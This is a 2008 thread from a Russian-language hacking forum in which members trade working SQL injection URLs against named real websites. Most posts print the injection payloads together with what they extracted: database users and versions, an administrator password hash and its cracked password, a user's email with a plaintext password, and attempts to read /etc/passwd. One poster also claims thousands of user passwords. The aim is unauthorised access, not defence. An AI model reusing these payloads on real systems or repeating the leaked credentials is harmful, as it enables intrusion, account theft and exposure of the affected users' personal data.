HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 499 из 1602 « Первая < 399449489 495 496 497 498 499 500 501 502 503 5095495999991499 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 12.03.2008, 19:39
ЛифчиС5СВ
Постоянный
Регистрация: 09.03.2007
Сообщений: 323
Провел на форуме:
1552920

Репутация: 369
По умолчанию
Плаватели Онтарио =)
www.swimontario.com

Код:
http://www.swimontario.com/news.php?id=15+union+select+1,2,3,4,5,6,7,8,concat_ws(char(58),user
(),version(),database())/*
1. swimont_cardoso@localhost:
2. 4.1.22-standard:
3. swimont_db

Не смог больше ничего подобрать... хнык =(
 
Ответить с цитированием

  #2  
Старый 12.03.2008, 22:01
vp$
Участник форума
Регистрация: 22.10.2007
Сообщений: 138
Провел на форуме:
2454040

Репутация: 177
По умолчанию
www.stroyprice.com PR4;ТИЦ950
Код:
http://stroyprice.com/kom_one.php?i=541000000+UNION+SELECT+1,concat_ws(0x3a,admin_fullname,admin_pw,admin_email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+phpads_config+limit+0,1/*
Administrator:5ebe2294ecd0e0f08eab7690d2a6ee69:inf o@stroyprice.com пасс secret

ну еще 3к юзеров с открытыми паролями
Код:
http://stroyprice.com/kom_one.php?i=541000000+UNION+SELECT+1,concat_ws(0x3a,usr_name,usr_mail,usr_pwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+str_tbl_usr+limit+0,1/*
kolya:grischenko@zap.kiev.ua:Lord21
 
Ответить с цитированием

  #3  
Старый 13.03.2008, 02:45
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию
Код:
http://www.chameleondeal.com/coupons/category.asp?ID=1%20or%201=(SELECT+TOP+1+cast(id+as+nvarchar)%2B%27%3A%27%2Bcast(FName+as+nvarchar)%2B%27%3A%27%2Bcast(MName+as+nvarchar)%2B%27%3A%27%2Bcast(LName+as+nvarchar)%2B%27%3A%27%2Bcast(Email+as+nvarchar)%2B%27%3A%27%2Bcast(StreetAddress+as+nvarchar)%2B%27%3A%27%2Bcast(City+as+nvarchar)%2B%27%3A%27%2Bcast(State+as+nvarchar)%2B%27%3A%27%2Bcast(Zip+as+nvarchar)%2B%27%3A%27%2Bcast(HomePhone+as+nvarchar)%2B%27%3A%27%2Bcast(WorkPhone+as+nvarchar)%2B%27%3A%27%2Bcast(Cell+as+nvarchar)%2B%27%3A%27%2Bcast(Pager+as+nvarchar)%2B%27%3A%27%2Bcast(Fax+as+nvarchar)%2B%27%3A%27%2Bcast(UserName+as+nvarchar)%2B%27%3A%27%2Bcast(Password+as+nvarchar)%2B%27%3A%27%2Bcast(DateEntered+as+nvarchar)%2B%27%3A%27%2Bcast(DateModified+as+nvarchar)+from+Staff)--
Код:
http://www.chameleondeal.com/coupons/category.asp?ID=1%20or%201=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('Coupons','Categories','deal','Deals','dtproperties','News','Oshkosh_west','Retailers','Staff','sysconstraints','syssegments','t_jiaozhu'))--
+ в админке ' or 1=1--
 
Ответить с цитированием

  #4  
Старый 13.03.2008, 09:58
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154

Репутация: 126
По умолчанию
http://www.itelltd.kiev.ua/index.php?page=equipment&id=111&man_id=0x27%20unio n+select+1,LOAD_FILE(0x2f6574632f706173737764),LOA D_FILE(0x2f6574632f706173737764),4,5,6,7,8,9+from+ news/*


ни чего не получается ни кто не скажет ПОЧЕМУ?
 
Ответить с цитированием

  #5  
Старый 13.03.2008, 17:38
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186

Репутация: 905


По умолчанию
Ну раз не работает Load_file, то логично предположить, что нет соответствующих прав, не так ли?
 
Ответить с цитированием

  #6  
Старый 13.03.2008, 18:22
cash$$$
Banned
Регистрация: 06.01.2008
Сообщений: 413
Провел на форуме:
1301036

Репутация: 1334
По умолчанию
Цитата:
http://hardmoney.pro/lending/lending.php?ID=99999+union+select+1,2,3,VERSION(), 5,6,7,8,9,10,11,12,13,14,15,16/*
VERSEON: 4.1.21-community-nt
USER: ksifunding@69.24.64.101
DATABASE: ksifunding

Цитата:
http://www.global-money.com/item.php?id=99999'+union+select+1,2,VERSION(),4,5, 6,7,8,9,10,11,12,13,14,15,16,17/*
VERSEON: 4.0.26
USER: globalmo@global-money.com
DATABASE: global_money_com_dev
 
Ответить с цитированием

  #7  
Старый 13.03.2008, 18:44
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


По умолчанию
http://freedocumentaries.org/film.php?id=-98+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18+user*

Лень подбирать вапще(. Когда пытаюсь выполнить запрос
http://freedocumentaries.org/film.php?id=-98+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18/*, то пишет мол в запросе другое количество столбцов:РР. или я отупел от столь длительного бездействия, или...или... пора на покой:Р.Встречал на многих сайтах и не раз входил в столько своеобразный тупняк =___=
 
Ответить с цитированием

  #8  
Старый 13.03.2008, 21:06
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167

Репутация: 100
По умолчанию
Движок Интернет магазина
http://www.vcam.ru/index.php?id=-1+union+select+user()/*
user: vcam_vcam@localhost
version : 4.1.22-standard
database : vcam_shop



http://www.combox.ru/index.php?id=3+union+select+1,2/*
user : combox_combox@localhost
database : combox_site
version : 4.1.22-standard

Это кстати, главная страница хостинга, и разработчика магазина. Как видите, уязвимость здесь тоже есть



http://www.ventorg.ru/divisions.php?id=-1+union+select+1,2,3,4/*
user : ventorg_torg@localhost
database : ventorg_shop
version : 4.1.22-standard
 
Ответить с цитированием

  #9  
Старый 14.03.2008, 00:34
CaNNabi$
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509

Репутация: 338
По умолчанию
http://www.vcam.ru

http://www.ventorg.ru

Боян, блин создали и обновили же АНТИБОЯН вот ТУТ
 
Ответить с цитированием

Сайты с хорошим ПР
  #10  
Старый 14.03.2008, 23:13
t0ox
Новичок
Регистрация: 23.10.2007
Сообщений: 17
Провел на форуме:
105851

Репутация: 46
По умолчанию Сайты с хорошим ПР
Цитата:
http://www.signs.pl/article.php?sid=-1+union+select+1,2,3,version(),5,6,7,8,9,10+from+u sers/*
PR: 5
5.1.19-beta
Эх, тоже когдато на сеате ездил
Цитата:
http://www.seat.gr/news/news.php?id=-1+UNION+SELECT+1,version(),3,4,5/*
PR: 6
4.0.27
Цитата:
http://www.krosno24.pl/informacje.php3?id=-1+union+select+1,2,3,4,5,6,version(),8,9/*
PR: 4
4.0.26
Цитата:
http://www.rtp.org/main/index.php?pid=-1+UNION+SELECT+1,2,version()/*
PR: 6
5.0.22
Цитата:
http://www.cnts.ru/price.dhtml?cid=-1+union+select+1,version(),3,4/*
http://www.cnts.ru/price.dhtml?cid=-1+union+select+1,password,login,4+from+users/*
http://www.cnts.ru/price.dhtml?cid=-1+union+select+1,concat(login,char(58),password),3 ,4+from+users/*
PR: 3
4.1.21-log
Цитата:
http://www.ochenk.com/entry.php?id=-1+union+select+1,2,3,version()/*
PR: 6
4.1.22-standard
Последний раз редактировалось t0ox; 14.03.2008 в 23:39..
 
Ответить с цитированием
Ответ
Страница 499 из 1602 « Первая < 399449489 495 496 497 498 499 500 501 502 503 5095495999991499 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.